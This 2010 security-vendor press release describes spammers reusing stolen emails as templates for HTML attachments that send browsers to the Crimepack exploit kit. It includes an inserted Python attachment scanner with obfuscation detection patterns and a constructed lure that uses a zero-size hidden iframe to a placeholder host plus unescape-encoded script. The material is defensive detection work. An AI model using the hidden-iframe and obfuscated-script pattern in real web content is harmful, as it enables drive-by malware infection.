SAN DIEGO, CA--(Marketwire - October 1, 2010) - St. Bernard's Red Condor (
Unbeknownst to most email users, genuine mail messages are being stolen from compromised computers and reused against the people who sent and received them. The sole purpose of this activity is to deliver malware that current anti-virus products seldom detect or remove.
A group of spammers had been suspected for several months of using stolen emails as templates for their malicious email campaigns, and recently a sample was obtained with sufficient detail to track the message back to its source. The message appeared to come from a religious organization in San Francisco, California, and purported to be an invitation to an annual festival the organization was hosting on September 19, 2010. Included with the email was an HTML attachment containing obfuscated JavaScript.
"We contacted the organization to ask about the event and its email marketing efforts," said Mary Mizrahi, product manager at St. Bernard. "We confirmed that this organization had sent emails to a specific list of contacts with a PDF attachment that contained more information about the event. The event, however, was actually on September 12, 2010, and the organization's legitimate email invitations had been sent well in advance of the event and prior to when the spam message had been captured. The content of the spam messages was verified to be extremely similar to the content of emails sent by the organization."
Mizrahi added, "St. Bernard's Red Condor has mentioned several times in recent news releases and blog posts that we believed cybercriminals were stealing actual emails to use as spam templates and employing exploit kits. We now have very strong evidence that this is in fact the case. The more genuine the email appears, the more likely they can circumvent spam filters and coerce users to click on links and attachments. Exploiting a user's curiosity has long been an effective mainstay tactic for spam with malicious intent. This is a sobering reminder that a seemingly benign action like opening an HTML attachment from an apparently misdirected email can have catastrophic repercussions."
For the religious organization's messages, it appears that spammers stole the original email from a compromised PC for the specific purpose of using it as a spam template. They changed the date to make it current and replaced the legitimate PDF attachment with a malicious payload. The technique we have named Plug-n-Play (PNP) is the use of an attachment or URL in a spam message that causes the recipient's browser to interact with an exploit kit or drive-by download, followed by a redirect to another page. PNP campaigns are designed to install malware, including Trojans and rootkits. The infections resulting from previous PNP attacks likely gave the spammers the access to these private emails that they then used in the next wave of attacks.
While this particular case allowed St. Bernard's Red Condor to verify the legitimate origin of the message turned spam template, several dozen, if not hundreds, of other messages used by this spam gang are likewise suspected of having been pilfered from the hard drives of compromised personal computers. The privacy implications of this ongoing technique are disconcerting, to say the least.
Spammers continue to experiment with the technique. A few days after the campaign that exposed the religious organization's message, another wave of campaigns followed. This time the HTML attached to the messages built from stolen emails consisted of spoofed email notifications from a variety of well-known brands, including Xbox Live, Facebook, Twitter, Netflix, StumbleUpon, Picasa, eBay and PayPal. Once the HTML attachment was opened in a browser and displayed a familiar service notification, an invisible iframe caused the browser to contact an exploit kit known as Crimepack, a well-known criminal software package that lets an attacker remotely attempt multiple exploits against a victim's browser. Upon finding a working exploit, the kit installs a variety of malware on the victim's machine, with no indication to the user that the computer has been compromised. Unfortunately, most anti-virus software cannot reliably detect this activity: fresh samples are rarely recognized by more than 15% of the 43 major AV engines, according to VirusTotal scans.
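The two traits that both waves of this campaign share, a hidden iframe that sends the browser to the exploit kit and obfuscated inline JavaScript in the attachment, can be checked for at the mail gateway before the attachment ever reaches a browser. The scanner below is an added example written for this article, not Red Condor's or St. Bernard's code; the attachment it scans is a constructed lookalike of the spoofed-notification attachments described above, and the host `kit.example.invalid` is a placeholder, not a real exploit-kit address. It uses only the Python standard library.

```python
"""Scan an HTML email attachment for the traits the campaigns above rely on:
a hidden <iframe> pointing at an external host (the exploit-kit hop), an
external or meta-refresh redirect, and obfuscated inline JavaScript."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Calls that almost every packed or encoded JavaScript payload needs.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode", "document.write(", "atob(")
# Long runs of %XX or \xXX escapes are typical of encoded payloads.
ESCAPE_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}){8,}")


def _is_hidden(attrs):
    """True when an iframe's attributes make it invisible to the reader."""
    a = {k.lower(): (v or "") for k, v in attrs}
    if "hidden" in a:
        return True
    style = a.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(?:left|top):-\d{3,}px", style):  # pushed off-screen
        return True

    def dim(name):
        m = re.match(r"\d+", a.get(name, ""))
        return int(m.group()) if m else None

    w, h = dim("width"), dim("height")
    return (w is not None and w <= 1) or (h is not None and h <= 1)  # 0x0 / 1x1


class AttachmentScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing the attachment."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            if _is_hidden(attrs):
                self.findings.append(("hidden_iframe", src))
            elif urlparse(src).hostname:
                self.findings.append(("external_iframe", src))
        elif tag == "script":
            self._in_script, self._script = True, []
            if a.get("src"):
                self.findings.append(("external_script", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            if "url=" in a.get("content", "").lower():
                self.findings.append(("meta_refresh", a["content"]))

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands <script> bodies to handle_data
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script)
            markers = [m for m in OBFUSCATION_MARKERS if m in body]
            if ESCAPE_RUN.search(body):
                markers.append("escape-run")
            if markers:
                self.findings.append(("obfuscated_script", ",".join(markers)))


def scan_html_attachment(html):
    """Return the list of (kind, detail) findings for one HTML attachment."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    return p.findings


def verdict(findings):
    """Gateway decision: a hidden iframe or obfuscated script is enough to block."""
    kinds = {k for k, _ in findings}
    if kinds & {"hidden_iframe", "obfuscated_script"}:
        return "block"
    if kinds & {"external_iframe", "external_script", "meta_refresh"}:
        return "quarantine"
    return "allow"


# Constructed sample modelled on the spoofed-notification attachments above.
# kit.example.invalid is a reserved, non-routable placeholder host.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Your account notification</h2>
<p>A new message is waiting for you. Please review it at your convenience.</p>
<iframe src="http://kit.example.invalid/in.php" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%73%63%72%69%70%74%3E%2F%2A%2A%2F%3C%2F%73%63%72%69%70%74%3E'));</script>
</body></html>"""

# Constructed benign attachment, like the organization's original invitation.
BENIGN_ATTACHMENT = """<html><body><p>Festival invitation: see the attached
programme for details.</p></body></html>"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        found = scan_html_attachment(doc)
        print(name, verdict(found), found)
```

The scanner deliberately stays ahead of the browser: it never executes the script, so it cannot be fooled by payloads that only decode themselves at run time, but it also cannot see what the iframe's target would serve. In practice the `hidden_iframe` and `obfuscated_script` findings are strong enough on their own to block or quarantine an HTML attachment, which is the point at which these campaigns are cheapest to stop.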
Visit St. Bernard's Red Condor Security Alerts blog for more details on these campaigns.
About St. Bernard Software
St. Bernard Software develops and markets Internet security appliances and services that empower IT professionals to effectively, efficiently and intelligently manage their enterprise's Internet-based resources. Originally founded in 1995 as a market leader in data security with its flagship product, Open File Manager™, the company is now recognized for delivering today's #1 Web filtering and security appliance, iPrism®. With millions of end users worldwide in more than 5,000 enterprises, educational institutions, SMBs, and government agencies, St. Bernard strives to deliver simple, high-performance solutions that offer excellent value to its customers.
Based in San Diego, California, St. Bernard (
About Red Condor
Red Condor's highly accurate email filter Vx Technology™ hybrid architecture and fully managed appliances lead to a dramatic reduction in the cost of owning a premium spam filter. With email security solutions for small-to-medium businesses, as well as for ISPs with millions of email inboxes, Red Condor is rapidly gaining market share. The company's email security system has built-in zero tolerance for lost email, and a near zero false-positive rate, with spam block rates that exceed 99%. Red Condor Archive is a secure message archiving service with lifetime retention and unlimited storage. The company's award-winning technology is backed 24/7 by a team of human email security experts monitoring for the latest email threats. For more information, visit www.redcondor.com.
(C)2010 St. Bernard Software Inc. All rights reserved. The St. Bernard Software logo, iPrism, iGuard, the Red Condor Logo, and Vx Technology are trademarks of St. Bernard Software Inc. All other trademarks and registered trademarks are hereby acknowledged.
Contact Information:
Media contact:
Lorrie Hunsaker
St. Bernard
(858) 524-2041